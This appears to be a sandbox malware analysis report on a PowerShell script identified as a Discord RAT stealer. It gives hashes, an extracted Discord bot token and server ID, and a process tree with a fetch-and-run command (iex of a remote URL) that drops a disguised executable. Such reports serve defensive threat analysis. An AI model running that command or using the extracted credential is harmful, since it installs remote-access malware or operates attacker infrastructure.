Overview

overview

10

Static

static

1

ClawGameTemp.ps1

windows7-x64

3

ClawGameTemp.ps1

windows10-2004-x64

10

Resubmissions

22-02-2025 22:46

250222-2p931a1ndm 10

22-02-2025 22:41

250222-2mjs2a1mhn 10

22-02-2025 21:12

250222-z15asazkfr 10

Analysis

  • max time kernel
    63s
  • max time network
    65s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-02-2025 22:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ClawGameTemp.ps1

  • Size

    7KB

  • MD5

    beab656dc763c45a35bf5833fae6349d

  • SHA1

    15e66182eeb30ec6b1b8b37d083108b58e9457e1

  • SHA256

    6f69db9e402c3ced09d2fffff59f5981515853395757dfc131967bd18b3c1689

  • SHA512

    1743c0cfea6f09abbb5370baa2cad9bd3956d3c47c755c8ed4a7c6dd16d7e8df6fae670e60d93a182f97e1593770084a83613b78a6ea45997a2e2fcbb8113bf6

  • SSDEEP

    192:oNQfEMxiPuj8JElIIxshDJ4J9yxWJrAikRhw1Qzf1dovaap0vo9vwvYvMqvUPPRs:/TiPGKiqwa7yXx/3

Score
10/10
discordratexecutionpersistenceratrootkitstealer

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTMzNDYzOTY4MTUwOTUyMzUyOQ.GKm08B.ABNGZNfi6vtmOyFyLPoQUZtHxEaRDGGRtNo4Ig

  • server_id

    1342605266801131601

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

    stealerrootkitratpersistencediscordrat
  • Discordrat family
    discordrat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ClawGameTemp.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iex (iwr 'powershellhelper.pythonanywhere.com/sxn')
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5064
      • C:\Users\Admin\040410cc-fc85-448b-989d-d271c9628ae2\COM Surrogate.exe
        "C:\Users\Admin\040410cc-fc85-448b-989d-d271c9628ae2\COM Surrogate.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2928

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\040410cc-fc85-448b-989d-d271c9628ae2\COM Surrogate.exe
    Filesize

    78KB

    MD5

    d5c87df30f41b030611b3066ef0b0894

    SHA1

    25cd9854c0a1706a66fef119111f119bf50538f9

    SHA256

    e9ed5a5e8065263091199b9bb72295fc0e82779f0c7a9f1230f3622691672e1c

    SHA512

    7b30ea2219fa441cb4984356fa6dcf539dfd01b12ba24f28438109ed3f238ddf641c74792b1dec88d3e2ea5657654fc9dd5bfe001f1c1bc4888c993fdf5483dc

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    23dc3b3280c3159a4731608ccab1c5d7

    SHA1

    6b2f95cbc74c129f40048377fba341b1e7633f58

    SHA256

    fff52d9b672eadfcd31b6dbd88572b1c4c882bcfbcde717ed1b5b780d7e44264

    SHA512

    fe83b97772a2253fe39ef7c1c214f2f9859d89402abbd4c5e94b0f1b584f49ad5c88f4f0d2af06601be29e6b9cc61f0ddd22053a19e14adac85150fcdea7936f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1exsvzxn.z1u.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/2104-9-0x0000018D5E8F0000-0x0000018D5E912000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2104-6-0x00007FF9AD3D0000-0x00007FF9ADE91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2104-12-0x00007FF9AD3D0000-0x00007FF9ADE91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2104-15-0x0000018D5E5D0000-0x0000018D5E7EC000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/2104-16-0x00007FF9AD3D0000-0x00007FF9ADE91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2104-0-0x00007FF9AD3D3000-0x00007FF9AD3D5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2928-46-0x000001BF9FEA0000-0x000001BF9FEB8000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2928-47-0x000001BFBA4E0000-0x000001BFBA6A2000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/2928-48-0x000001BFBAD20000-0x000001BFBB248000-memory.dmp

    Filesize

    5.2MB

    Download

  • memory/5064-32-0x00007FF9AD3D0000-0x00007FF9ADE91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5064-33-0x000001C059900000-0x000001C05A0A6000-memory.dmp

    Filesize

    7.6MB

    Download

  • memory/5064-31-0x00007FF9AD3D0000-0x00007FF9ADE91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5064-29-0x00007FF9AD3D0000-0x00007FF9ADE91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5064-49-0x00007FF9AD3D0000-0x00007FF9ADE91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5064-50-0x00007FF9AD3D0000-0x00007FF9ADE91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5064-51-0x00007FF9AD3D0000-0x00007FF9ADE91000-memory.dmp

    Filesize

    10.8MB

    Download